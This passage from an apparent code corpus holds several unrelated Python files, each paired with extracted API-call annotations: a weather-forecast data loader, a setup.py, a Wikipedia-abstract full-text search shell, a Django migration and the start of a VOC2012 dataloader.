[((659, 687), 'atlas.common.fetch_finbif_api', 'common.fetch_finbif_api', (['url'], {}), '(url)\n', (682, 687), True, 'import atlas.common as common\n'), ((2448, 2491), 'atlas.common.valid_square_id', 'common.valid_square_id', (['square_id_untrusted'], {}), '(square_id_untrusted)\n', (2470, 2491), True, 'import atlas.common as common\n'), ((2547, 2578), 'atlas.common.neighbour_ids', 'common.neighbour_ids', (['square_id'], {}), '(square_id)\n', (2567, 2578), True, 'import atlas.common as common\n'), ((2834, 2876), 'atlas.common.coordinate_accuracy_data', 'common.coordinate_accuracy_data', (['square_id'], {}), '(square_id)\n', (2865, 2876), True, 'import atlas.common as common\n'), ((3069, 3098), 'atlas.common.square_info', 'common.square_info', (['square_id'], {}), '(square_id)\n', (3087, 3098), True, 'import atlas.common as common\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# created by <NAME>
# contact with <EMAIL>
import numpy as np
import datetime
import os
import pandas as pd
import random
import time
import threading
import multiprocessing
def check_file(tt,datelist,hour):
'''
    Check that the file at time 'tt' exists, together with the following 24
    forecast hours and the preceding 'hour' history hours.
    The forecast times cover 25 steps including 'tt' itself; the history
    covers 'hour' steps back from 'tt'.
    Return True if every required file is ready at time 'tt'.
'''
ruitufile = '/data/output/ruitu_data/{}/{}.npy'.format(tt.strftime('%Y%m'),tt.strftime('%Y%m%d%H'))
sign = os.path.exists(ruitufile)
if sign:
pass
# shape0 = np.load(ruitufile).shape[0]
# sign = sign and shape0==25
# if not shape0==25:
# print(ruitufile)
# os.remove(ruitufile)
else:
return False
pretimelist = [ tt+datetime.timedelta(seconds=3600*i) for i in range(25)]
pretimelist = pretimelist+ [ tt-datetime.timedelta(seconds=3600*i) for i in range(hour)]
for pretime in pretimelist:
# gaughDir = '/data/output/guance_data/{}/{}.npy'.format(pretime)
timestring = pretime.strftime("%Y%m%d%H%M")
sign = (timestring in datelist ) and sign
if sign==False :
# print(timestring,os.path.exists(ruitufile),timestring in datelist)
break
return sign
def file_dataset(hour ):
'''write a data-ready file list'''
print('creating the dataset with history ', hour, ' hours')
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/all_gc_filename_list.csv',index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
start_time, end_time = datetime.datetime(2016,10,1,0),datetime.datetime(2019,4,1,0)
pretimelist=[]
pretime= start_time
while pretime<=end_time:
if check_file(pretime,datelist,hour):
pretimelist.append(pretime)
pretime += datetime.timedelta(seconds=3600*3)
pretimelist = np.array(pretimelist)
np.save('/data/code/ml/pretimelist_{}.npy'.format(hour),pretimelist)
    print('finished creating dataset with history ', hour, ' hours')
return None
def my_test_dataset( batch, history_hour, season=None ):
'''return list shape [number , batch]'''
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv', index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
target = '/data/code/ml/pretimelist_test_{}.npy'.format(history_hour)
if not os.path.exists(target):
file_test_dataset( history_hour )
pretimelist = np.load(target, allow_pickle=True)
if season=='summer':
tmp = []
for pretime in pretimelist:
if pretime.month in [4,5,6,7,8,9]:
tmp.append(pretime)
pretimelist = np.array(tmp)
    print('dataset length', len(pretimelist))
pretimelist = pretimelist[:len(pretimelist)//batch*batch]
pretimelist = np.array(pretimelist).reshape(-1, batch)
return pretimelist, file_dict
def file_test_dataset(hour ):
'''write a data-ready file list'''
print('creating the dataset with history ', hour, ' hours')
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv',index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
start_time, end_time = datetime.datetime(2019,4,1,0),datetime.datetime(2019,7,31,21)
pretimelist=[]
pretime= start_time
while pretime<=end_time:
if check_file(pretime,datelist,hour):
pretimelist.append(pretime)
pretime += datetime.timedelta(seconds=3600*3)
pretimelist = np.array(pretimelist)
np.save('/data/code/ml/pretimelist_test_{}.npy'.format(hour),pretimelist)
    print('finished creating dataset with history ', hour, ' hours')
return None
def my_dataset( batch, history_hour, season=None ):
'''return list shape [number , batch]'''
file_dict = pd.read_csv('/data/output/all_guance_data_name_list/all_gc_filename_list.csv', index_col=0)
datelist = [str(line).split('_')[1] for line in file_dict.values]
file_dict.index = datelist
target = '/data/code/ml/pretimelist_{}.npy'.format(history_hour)
if not os.path.exists(target):
file_dataset( history_hour )
pretimelist = np.load(target, allow_pickle=True)
if season=='summer':
tmp = []
for pretime in pretimelist:
if pretime.month in [6,7,8,9]:
tmp.append(pretime)
pretimelist = np.array(tmp)
    print('dataset length', len(pretimelist))
pretimelist = pretimelist[:len(pretimelist)//batch*batch]
random.shuffle(pretimelist)
pretimelist = np.array(pretimelist).reshape(-1, batch)
return pretimelist, file_dict
def combine_thread(batch_list, batch_time):
    '''
    Read a batch of files in parallel with a multiprocessing pool.
    '''
print("Sub-process(es) begin.")
ruitulist, gaugelist, histgaugelist, jobresults = [], [], [], []
pool = multiprocessing.Pool(processes=8)
for filelist, pretime in zip(batch_list, batch_time):
jobresults.append(pool.apply_async(read_one, (filelist, pretime)))
for res in jobresults:
ruituFile, gaugeFile, histgaugeFile = res.get()
ruitulist.append(ruituFile)
gaugelist.append(gaugeFile)
histgaugelist.append(histgaugeFile)
    pool.close()  # close the pool: no new tasks can be submitted after this
    pool.join()   # wait for all pool workers to finish; must be called after close()
print("Sub-process(es) done.")
gaugelist, ruitulist, histgaugelist = np.array(gaugelist), np.array(ruitulist), np.array(histgaugelist)
# print(gaugelist.shape, ruitulist.shape, histgaugelist.shape)
return ruitulist, gaugelist, histgaugelist
def read_one(filelist, pretime):
    '''Read a single training sample and apply preprocessing.'''
# tt = time.time()
ruituFile = np.load(filelist[0])[:,:,:80,:84]
# print('processing',pretime)
gaugeFile = np.array([np.load(file) for file in filelist[1:25]])[:,4:5,:80,:84]
histgaugeFile = np.array([np.load(file) for file in filelist[25:]])[:,:,:80,:84]
ruituFile, gaugeFile, histgaugeFile = norm_preprocess(ruituFile, gaugeFile, histgaugeFile, pretime)
# print(time.time()-tt)
return ruituFile, gaugeFile, histgaugeFile
def norm_preprocess(ruituFile, gaugeFile, histgaugeFile, pretime):
'''
    Fix abnormal values, add time and geography features, and normalize the values.
'''
# print(ruituFile.shape, gaugeFile.shape, histgaugeFile.shape)
    # remove abnormal values
    assert ruituFile.shape[0] == 25, '{} without full prediction'.format(pretime)
if (np.abs(ruituFile) > 10000).any():
meantmp = ruituFile.mean(axis=(0,2,3))
for i in range(ruituFile.shape[1]):
ruituFile[:,i,:,:][np.abs(ruituFile[:,i,:,:])>10000] = meantmp[i]
histgaugeFile[np.isnan(histgaugeFile)]=200000
if (np.abs(histgaugeFile) > 10000).any():
meantmp = histgaugeFile.mean(axis=(0,2,3))
for i in range(histgaugeFile.shape[1]):
histgaugeFile[:,i,:,:][np.abs(histgaugeFile[:,i,:,:])>10000] = meantmp[i]
    # normalize the values
ruituInfo = pd.read_csv('/data/output/ruitu_info.csv')
ruitu_mean, ruitu_std = np.ones_like(ruituFile),np.ones_like(ruituFile)
for i in range(len(ruituInfo)):
ruitu_mean[:,i,:,:] *= ruituInfo['mean'].iloc[i]
ruitu_std[:,i,:,:] *= ruituInfo['std'].iloc[i]
ruituFile = (ruituFile-ruitu_mean)/ruitu_std
gaugeInfo = pd.read_csv('/data/output/gauge_info.csv')
gauge_mean, gauge_std = np.ones_like(histgaugeFile),np.ones_like(histgaugeFile)
for i in range(len(gaugeInfo)):
gauge_mean[:,i,:,:] *= gaugeInfo['mean'].iloc[i]
gauge_std[:,i,:,:] *= gaugeInfo['std'].iloc[i]
histgaugeFile = (histgaugeFile-gauge_mean)/gauge_std
#add time and geo info
geoinfo = np.load('/data/output/height_norm.npy')
hist_hour = histgaugeFile.shape[0]
pretimelist = [pretime+datetime.timedelta(seconds=i*3600) for i in range(-hist_hour+1, 25)]
yearvariancelist = [ np.sin(2*np.pi*(tt.toordinal()-730180)/365.25) for tt in pretimelist]
dayvariancelist = [ np.sin(2*np.pi*(tt.hour-3)/24) for tt in pretimelist]
ruituFile[1:25, 32:35, :, :] = ruituFile[1:25, 32:35, :, :] - ruituFile[0:24,32:35,:,:]
ruituFile_new = ruituFile[1:].copy()
histgaugeFile[:,7,:,:] = np.array([geoinfo]*histgaugeFile.shape[0])
histgaugeFile[:,10,:,:] = np.array([sli*yvar for sli, yvar in zip(np.ones([hist_hour,80,84]),yearvariancelist[:hist_hour])])
histgaugeFile[:,11,:,:] = np.array([sli*dvar for sli, dvar in zip(np.ones([hist_hour,80,84]),dayvariancelist[:hist_hour])])
tmpyear = np.expand_dims([sli*yvar for sli, yvar in zip(np.ones([24,80,84]),yearvariancelist[hist_hour:])], axis=1)
tmpday = np.expand_dims([sli*dvar for sli, dvar in zip(np.ones([24,80,84]),dayvariancelist[hist_hour:])], axis=1)
tmpgeo = np.expand_dims(np.array([geoinfo]*ruituFile_new.shape[0]),axis=1)
ruituFile_new = np.concatenate((ruituFile_new, tmpyear, tmpday, tmpgeo),axis=1)
# print(ruituFile_new.shape, gaugeFile.shape, histgaugeFile.shape)
return ruituFile_new, gaugeFile, histgaugeFile
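# Note on the time features above (illustrative, not in the original file):
# 730180 is datetime.date(2000, 3, 1).toordinal(), so the yearly feature
# sin(2*pi*(toordinal - 730180)/365.25) crosses zero around March 1 each year,
# while the daily feature sin(2*pi*(hour - 3)/24) peaks around 09:00.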
def load_data2(pretimelist, file_dict, history_hour, binary=False):
'''
    Load a batch of data in parallel; much faster than the sequential loader.
    input args: load_data2(pretimelist, file_dict, history_hour, binary=False)
    return args: ruitudata, gaugedata, histgaugedata
    shape: [batch, 24, channels_1, height, width], [batch, 24, 1, height, width], [batch, history_hour, channels_2, height, width]
    if binary is True, gaugedata is returned in shape [batch, time, 2, height, width]
'''
pretimelist = list(pretimelist)
batchfile = []
for batch_time in pretimelist:
ruituFile = ['/data/output/ruitu_data/{}/{}.npy'.format(batch_time.strftime('%Y%m'),batch_time.strftime('%Y%m%d%H'))]
time24h = [ batch_time+datetime.timedelta(seconds=3600*i) for i in range(1,25)]
gaugeFile = ['/data/output/guance_data/{}/{}'.format(tt.strftime('%Y%m'),file_dict.loc[tt.strftime('%Y%m%d%H%M')].values[0]) for tt in time24h]
timehist = [ batch_time-datetime.timedelta(seconds=3600*i) for i in range(history_hour)]
histgaugeFile = ['/data/output/guance_data/{}/{}'.format(tt.strftime('%Y%m'),file_dict.loc[tt.strftime('%Y%m%d%H%M')].values[0]) for tt in timehist]
singlefile = ruituFile+gaugeFile+histgaugeFile
batchfile.append(singlefile)
    ruitudata, gaugedata, histgaugedata = combine_thread(batchfile, pretimelist)
if binary:
# gaugedata = (gaugedata>=0.1).astype('int')
gaugebinary = np.concatenate((gaugedata>=0.1, gaugedata<0.1),axis=2).astype('int')
gaugedata[ gaugedata<0.1]=0
return np.array(ruitudata)[:,:,:,:80,:80], np.array(gaugebinary)[:,:,:,:80,:80], np.array(gaugedata[:,:,:,:80,:80])
# def load_data(pretimelist,file_dict):
# '''pretimelist is a batch timelist at once
# output shape = [batch, 24, channel, 80, 84],[batch, 24, channel, 80, 84]
# '''
# print('old')
# t1 = time.time()
# pretimelist = list(pretimelist)
# gaugedata = []
# ruitudata = []
# for batch_time in pretimelist:
# ruitutmp = np.load('/data/output/ruitu_data/{}/{}.npy'.format(batch_time.strftime('%Y%m'),batch_time.strftime('%Y%m%d%H')))[:24,:,:80,:84]
# time24h = [ batch_time+datetime.timedelta(seconds=3600) for i in range(24)]
# guagetmp = np.array([np.load('/data/output/guance_data/{}/{}'.format(tt.strftime('%Y%m'),file_dict.loc[tt.strftime('%Y%m%d%H%M')].values[0])) for tt in time24h])[:,4:5,:80,:84]
# gaugedata.append(guagetmp)
# ruitudata.append(ruitutmp)
# print('total:',time.time()-t1)
# return np.array(gaugedata), np.array(ruitudata)
if __name__=='__main__':
batch = 8
historyhour = 24
batch_filelist, file_dict = my_dataset( batch, historyhour,season='summer')
split_num=0.7
train_num = int(len(batch_filelist)*split_num)
mydataset = {'train':batch_filelist[:train_num], 'test': batch_filelist[train_num:]}
for filelist in mydataset['train']:
tt = time.time()
ruitudata, gaugedata, histgaugedata = load_data2(filelist,file_dict,historyhour, binary=True)
print(gaugedata.shape, ruitudata.shape, histgaugedata.shape, 'finished time cost:',time.time()-tt)
# print(gaugedata.mean(axis=(0,1,3,4)),gaugedata.std(axis=(0,1,3,4)))
# print(ruitudata.mean(axis=(0,1,3,4)),ruitudata.std(axis=(0,1,3,4)))
# print(histgaugedata.mean(axis=(0,1,3,4)),histgaugedata.std(axis=(0,1,3,4)))
|
[
"numpy.load",
"numpy.ones_like",
"numpy.abs",
"pandas.read_csv",
"random.shuffle",
"os.path.exists",
"numpy.ones",
"numpy.isnan",
"datetime.datetime",
"time.time",
"numpy.sin",
"numpy.array",
"datetime.timedelta",
"multiprocessing.Pool",
"numpy.concatenate"
] |
[((593, 618), 'os.path.exists', 'os.path.exists', (['ruitufile'], {}), '(ruitufile)\n', (607, 618), False, 'import os\n'), ((1522, 1617), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/all_gc_filename_list.csv"""'], {'index_col': '(0)'}), "('/data/output/all_guance_data_name_list/all_gc_filename_list.csv',\n    index_col=0)\n", (1533, 1617), True, 'import pandas as pd\n'), ((2033, 2054), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (2041, 2054), True, 'import numpy as np\n'), ((2333, 2440), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv"""'], {'index_col': '(0)'}), "(\n    '/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv',\n    index_col=0)\n", (2344, 2440), True, 'import pandas as pd\n'), ((2702, 2736), 'numpy.load', 'np.load', (['target'], {'allow_pickle': '(True)'}), '(target, allow_pickle=True)\n', (2709, 2736), True, 'import numpy as np\n'), ((3289, 3396), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv"""'], {'index_col': '(0)'}), "(\n    '/data/output/all_guance_data_name_list/2019_04_07_gc_filename_list.csv',\n    index_col=0)\n", (3300, 3396), True, 'import pandas as pd\n'), ((3808, 3829), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (3816, 3829), True, 'import numpy as np\n'), ((4109, 4204), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/all_guance_data_name_list/all_gc_filename_list.csv"""'], {'index_col': '(0)'}), "('/data/output/all_guance_data_name_list/all_gc_filename_list.csv',\n    index_col=0)\n", (4120, 4204), True, 'import pandas as pd\n'), ((4461, 4495), 'numpy.load', 'np.load', (['target'], {'allow_pickle': '(True)'}), '(target, allow_pickle=True)\n', (4468, 4495), True, 'import numpy as np\n'), ((4805, 4832), 'random.shuffle', 'random.shuffle', (['pretimelist'], {}), '(pretimelist)\n', (4819, 4832), False, 'import random\n'), ((5151, 5184), 'multiprocessing.Pool', 'multiprocessing.Pool', ([], {'processes': '(8)'}), '(processes=8)\n', (5171, 5184), False, 'import multiprocessing\n'), ((7309, 7351), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/ruitu_info.csv"""'], {}), "('/data/output/ruitu_info.csv')\n", (7320, 7351), True, 'import pandas as pd\n'), ((7642, 7684), 'pandas.read_csv', 'pd.read_csv', (['"""/data/output/gauge_info.csv"""'], {}), "('/data/output/gauge_info.csv')\n", (7653, 7684), True, 'import pandas as pd\n'), ((8020, 8059), 'numpy.load', 'np.load', (['"""/data/output/height_norm.npy"""'], {}), "('/data/output/height_norm.npy')\n", (8027, 8059), True, 'import numpy as np\n'), ((8530, 8574), 'numpy.array', 'np.array', (['([geoinfo] * histgaugeFile.shape[0])'], {}), '([geoinfo] * histgaugeFile.shape[0])\n', (8538, 8574), True, 'import numpy as np\n'), ((9167, 9231), 'numpy.concatenate', 'np.concatenate', (['(ruituFile_new, tmpyear, tmpday, tmpgeo)'], {'axis': '(1)'}), '((ruituFile_new, tmpyear, tmpday, tmpgeo), axis=1)\n', (9181, 9231), True, 'import numpy as np\n'), ((1742, 1775), 'datetime.datetime', 'datetime.datetime', (['(2016)', '(10)', '(1)', '(0)'], {}), '(2016, 10, 1, 0)\n', (1759, 1775), False, 'import datetime\n'), ((1773, 1805), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(4)', '(1)', '(0)'], {}), '(2019, 4, 1, 0)\n', (1790, 1805), False, 'import datetime\n'), ((1980, 2016), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * 3)'}), '(seconds=3600 * 3)\n', (1998, 2016), False, 'import datetime\n'), ((2618, 2640), 'os.path.exists', 'os.path.exists', (['target'], {}), '(target)\n', (2632, 2640), False, 'import os\n'), ((2925, 2938), 'numpy.array', 'np.array', (['tmp'], {}), '(tmp)\n', (2933, 2938), True, 'import numpy as np\n'), ((3516, 3548), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(4)', '(1)', '(0)'], {}), '(2019, 4, 1, 0)\n', (3533, 3548), False, 'import datetime\n'), ((3546, 3580), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(7)', '(31)', '(21)'], {}), '(2019, 7, 31, 21)\n', (3563, 3580), False, 'import datetime\n'), ((3755, 3791), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * 3)'}), '(seconds=3600 * 3)\n', (3773, 3791), False, 'import datetime\n'), ((4382, 4404), 'os.path.exists', 'os.path.exists', (['target'], {}), '(target)\n', (4396, 4404), False, 'import os\n'), ((4680, 4693), 'numpy.array', 'np.array', (['tmp'], {}), '(tmp)\n', (4688, 4693), True, 'import numpy as np\n'), ((5684, 5703), 'numpy.array', 'np.array', (['gaugelist'], {}), '(gaugelist)\n', (5692, 5703), True, 'import numpy as np\n'), ((5705, 5724), 'numpy.array', 'np.array', (['ruitulist'], {}), '(ruitulist)\n', (5713, 5724), True, 'import numpy as np\n'), ((5726, 5749), 'numpy.array', 'np.array', (['histgaugelist'], {}), '(histgaugelist)\n', (5734, 5749), True, 'import numpy as np\n'), ((6003, 6023), 'numpy.load', 'np.load', (['filelist[0]'], {}), '(filelist[0])\n', (6010, 6023), True, 'import numpy as np\n'), ((7000, 7023), 'numpy.isnan', 'np.isnan', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7008, 7023), True, 'import numpy as np\n'), ((7380, 7403), 'numpy.ones_like', 'np.ones_like', (['ruituFile'], {}), '(ruituFile)\n', (7392, 7403), True, 'import numpy as np\n'), ((7404, 7427), 'numpy.ones_like', 'np.ones_like', (['ruituFile'], {}), '(ruituFile)\n', (7416, 7427), True, 'import numpy as np\n'), ((7713, 7740), 'numpy.ones_like', 'np.ones_like', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7725, 7740), True, 'import numpy as np\n'), ((7741, 7768), 'numpy.ones_like', 'np.ones_like', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7753, 7768), True, 'import numpy as np\n'), ((8314, 8352), 'numpy.sin', 'np.sin', (['(2 * np.pi * (tt.hour - 3) / 24)'], {}), '(2 * np.pi * (tt.hour - 3) / 24)\n', (8320, 8352), True, 'import numpy as np\n'), ((9096, 9140), 'numpy.array', 'np.array', (['([geoinfo] * ruituFile_new.shape[0])'], {}), '([geoinfo] * ruituFile_new.shape[0])\n', (9104, 9140), True, 'import numpy as np\n'), ((11018, 11056), 'numpy.array', 'np.array', (['gaugedata[:, :, :, :80, :80]'], {}), '(gaugedata[:, :, :, :80, :80])\n', (11026, 11056), True, 'import numpy as np\n'), ((12345, 12356), 'time.time', 'time.time', ([], {}), '()\n', (12354, 12356), False, 'import time\n'), ((878, 914), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (896, 914), False, 'import datetime\n'), ((3064, 3085), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (3072, 3085), True, 'import numpy as np\n'), ((4851, 4872), 'numpy.array', 'np.array', (['pretimelist'], {}), '(pretimelist)\n', (4859, 4872), True, 'import numpy as np\n'), ((8126, 8162), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(i * 3600)'}), '(seconds=i * 3600)\n', (8144, 8162), False, 'import datetime\n'), ((10944, 10963), 'numpy.array', 'np.array', (['ruitudata'], {}), '(ruitudata)\n', (10952, 10963), True, 'import numpy as np\n'), ((10980, 11001), 'numpy.array', 'np.array', (['gaugebinary'], {}), '(gaugebinary)\n', (10988, 11001), True, 'import numpy as np\n'), ((969, 1005), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (987, 1005), False, 'import datetime\n'), ((6097, 6110), 'numpy.load', 'np.load', (['file'], {}), '(file)\n', (6104, 6110), True, 'import numpy as np\n'), ((6185, 6198), 'numpy.load', 'np.load', (['file'], {}), '(file)\n', (6192, 6198), True, 'import numpy as np\n'), ((6766, 6783), 'numpy.abs', 'np.abs', (['ruituFile'], {}), '(ruituFile)\n', (6772, 6783), True, 'import numpy as np\n'), ((7040, 7061), 'numpy.abs', 'np.abs', (['histgaugeFile'], {}), '(histgaugeFile)\n', (7046, 7061), True, 'import numpy as np\n'), ((10095, 10131), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (10113, 10131), False, 'import datetime\n'), ((10336, 10372), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(3600 * i)'}), '(seconds=3600 * i)\n', (10354, 10372), False, 'import datetime\n'), ((10827, 10886), 'numpy.concatenate', 'np.concatenate', (['(gaugedata >= 0.1, gaugedata < 0.1)'], {'axis': '(2)'}), '((gaugedata >= 0.1, gaugedata < 0.1), axis=2)\n', (10841, 10886), True, 'import numpy as np\n'), ((12550, 12561), 'time.time', 'time.time', ([], {}), '()\n', (12559, 12561), False, 'import time\n'), ((6922, 6951), 'numpy.abs', 'np.abs', (['ruituFile[:, i, :, :]'], {}), '(ruituFile[:, i, :, :])\n', (6928, 6951), True, 'import numpy as np\n'), ((7212, 7245), 'numpy.abs', 'np.abs', (['histgaugeFile[:, i, :, :]'], {}), '(histgaugeFile[:, i, :, :])\n', (7218, 7245), True, 'import numpy as np\n'), ((8643, 8671), 'numpy.ones', 'np.ones', (['[hist_hour, 80, 84]'], {}), '([hist_hour, 80, 84])\n', (8650, 8671), True, 'import numpy as np\n'), ((8772, 8800), 'numpy.ones', 'np.ones', (['[hist_hour, 80, 84]'], {}), '([hist_hour, 80, 84])\n', (8779, 8800), True, 'import numpy as np\n'), ((8890, 8911), 'numpy.ones', 'np.ones', (['[24, 80, 84]'], {}), '([24, 80, 84])\n', (8897, 8911), True, 'import numpy as np\n'), ((9009, 9030), 'numpy.ones', 'np.ones', (['[24, 80, 84]'], {}), '([24, 80, 84])\n', (9016, 9030), True, 'import numpy as np\n')]
|
import setuptools
setuptools.setup(
name="math-algorithm-models",
version="0.0.1",
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
description="simple algorithms executor",
long_description=open("README.md", "rt").read(),
long_description_content_type="text/markdown",
url="https://github.com/RullDeef/MarkovAlgorifms",
package_dir={"": "src"},
packages=setuptools.find_packages("src"),
entry_points={"console_scripts": ["matalg=matalg.executor:main"]},
setup_requires=["pytest-runner"],
tests_require=["pytest"]
)
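# Hedged usage note (not part of the original file): with the src layout and
# console_scripts entry point declared above, a typical local workflow would be
#   pip install -e .
#   matalg <program-file>
# where the exact CLI arguments depend on matalg.executor.main and are an
# assumption here.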
|
[
"setuptools.find_packages"
] |
[((407, 438), 'setuptools.find_packages', 'setuptools.find_packages', (['"""src"""'], {}), "('src')\n", (431, 438), False, 'import setuptools\n')]
|
#!/usr/bin/env python3
import time
import cmd
import sys
import gzip
import functools
import re
import xml.etree.ElementTree as ElementTree
from typing import List, Set, Dict, Iterator
from tqdm import tqdm
class Document:
def __init__(self, doc_id, title, url, abstract):
self.doc_id = doc_id
self.title = title
self.url = url
self.abstract = abstract
def __repr__(self):
return '<Document id = "{}", title = "{}", url = "{}", abstract = "{}">'.format(
self.doc_id, self.title, self.url, self.abstract)
def measure_time(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
print("Elapsed time: {} seconds".format(end_time - start_time))
return result
return wrapper
def load_documents(file_path: str) -> Iterator[Document]:
doc_id = 0
    with gzip.open(file_path, "r") as f:
        tree = ElementTree.iterparse(f)
for event, elem in tree:
if elem.tag == "doc":
doc_id += 1
title = elem.find('title').text
url = elem.find('url').text
abstract = elem.find('abstract').text
yield Document(doc_id, title, url, abstract)
def tokenizer(text: str) -> List[str]:
return re.findall(r"\w[\w']*\w|\w", text)
def filter_stopwords(tokens: List[str]) -> List[str]:
global stopwords
if not stopwords:
stopwords = set()
with open('stopwords.txt') as f:
stopwords = set([w.strip('\n') for w in f.readlines()])
return list(filter(lambda w: w not in stopwords, tokens))
def analyze(text: str) -> List[str]:
if text is None or len(text) == 0:
return []
from nltk.stem import PorterStemmer
stemmer = PorterStemmer()
tokens = filter_stopwords([token.lower() for token in tokenizer(text)])
tokens = [stemmer.stem(w) for w in tokens]
return tokens
@measure_time
def index_documents(docs: List[Document]):
global index
for doc in tqdm(docs):
for token in analyze(doc.abstract):
if (token in index) and index[token][-1] == doc.doc_id:
continue
index.setdefault(token, []).append(doc.doc_id)
@measure_time
def search(term: str) -> List[Set[int]]:
doc_idx = []
for token in analyze(term):
if token in index:
doc_idx.append(set(index[token]))
return doc_idx
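# Hedged sketch (not part of the original module): multi-term search gives
# AND semantics by intersecting the posting sets returned by search();
# the values below are invented for illustration.
#   index = {"wiki": [1, 2, 3], "search": [2, 3, 4]}
#   set.intersection({1, 2, 3}, {2, 3, 4}) -> {2, 3}
# FTSShell.do_search below applies exactly this intersection.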
class FTSShell(cmd.Cmd):
intro = 'Full text search. Type help or ? to list commands.\n'
prompt = '>> '
data = {'wikipedia': 'enwiki-latest-abstract1.xml.gz'}
def do_data(self, arg):
'Show all text data'
        print(FTSShell.data)
def do_load(self, arg):
'Load data for search'
if arg not in FTSShell.data:
print("Data does not exist! Please choose below dataset")
print(FTSShell.data)
return
self.data = FTSShell.data[arg]
print("Loading data [{}] ...".format(self.data))
self.docs_iterator = load_documents(self.data)
def do_index(self, arg):
'Index loaded data'
self.docs = {}
for doc in self.docs_iterator:
self.docs[doc.doc_id] = doc
index_documents(self.docs.values())
def do_search(self, arg):
'Search for keywords'
try:
print("Searching for: {} in {}".format(arg, self.data))
result_sets = search(arg)
result = set.intersection(*result_sets)
print("====== Found {} documents ======".format(len(result)))
for ids in result:
print(self.docs[ids])
except AttributeError:
print("Data needed to be loaded before searching. [help load] for more detail")
def do_EOF(self, arg):
'Return from this shell'
print('\nGood bye!')
return True
def emptyline(self):
pass
if __name__ == "__main__":
index = dict()
stopwords = set()
FTSShell().cmdloop()
|
[
"tqdm.tqdm",
"xml.etree.ElementTree.iterparse",
"gzip.open",
"nltk.stem.PorterStemmer",
"time.time",
"re.findall",
"functools.wraps"
] |
[((600, 621), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (615, 621), False, 'import functools\n'), ((1390, 1427), 're.findall', 're.findall', (['"""\\\\w[\\\\w\']*\\\\w|\\\\w"""', 'text'], {}), '("\\\\w[\\\\w\']*\\\\w|\\\\w", text)\n', (1400, 1427), False, 'import re\n'), ((1872, 1887), 'nltk.stem.PorterStemmer', 'PorterStemmer', ([], {}), '()\n', (1885, 1887), False, 'from nltk.stem import PorterStemmer\n'), ((2120, 2130), 'tqdm.tqdm', 'tqdm', (['docs'], {}), '(docs)\n', (2124, 2130), False, 'from tqdm import tqdm\n'), ((677, 688), 'time.time', 'time.time', ([], {}), '()\n', (686, 688), False, 'import time\n'), ((747, 758), 'time.time', 'time.time', ([], {}), '()\n', (756, 758), False, 'import time\n'), ((956, 981), 'gzip.open', 'gzip.open', (['file_path', '"""r"""'], {}), "(file_path, 'r')\n", (965, 981), False, 'import gzip\n'), ((1007, 1035), 'xml.etree.ElementTree.iterparse', 'ElementTree.iterparse', (['input'], {}), '(input)\n', (1028, 1035), True, 'import xml.etree.ElementTree as ElementTree\n')]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2018-03-16 05:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('imageflow', '0008_remove_reduction_image_companion'),
]
operations = [
migrations.RemoveField(
model_name='imageanalysis',
name='target_name',
),
]
|
[
"django.db.migrations.RemoveField"
] |
[((307, 377), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""imageanalysis"""', 'name': '"""target_name"""'}), "(model_name='imageanalysis', name='target_name')\n", (329, 377), False, 'from django.db import migrations\n')]
|
#!/usr/bin/env python3
#
# Copyright 2021 Graviti. Licensed under MIT License.
#
# pylint: disable=invalid-name
"""Dataloader of VOC2012Detection dataset."""
import os
from tensorbay.dataset import Dataset
from tensorbay.opendataset._utility import get_boolean_attributes, get_voc_detection_data
DATASET_NAME = "VOC2012Detection"
_SEGMENT_NAMES = ("train", "val")
def VOC2012Detection(path: str) -> Dataset:
"""`VOC2012Detection <http://host.robots.ox.ac.uk/pascal/VOC/voc2012/>`_ dataset.
The file structure should be like::
<path>
Annotations/
<image_name>.xml
...
JPEGImages/
<image_name>.jpg
...
ImageSets/
Main/
train.txt
val.txt
...
...
...
Arguments:
path: The root directory of the dataset.
Returns:
        Loaded :class:`~tensorbay.dataset.dataset.Dataset` instance.
"""
root_path = os.path.abspath(os.path.expanduser(path))
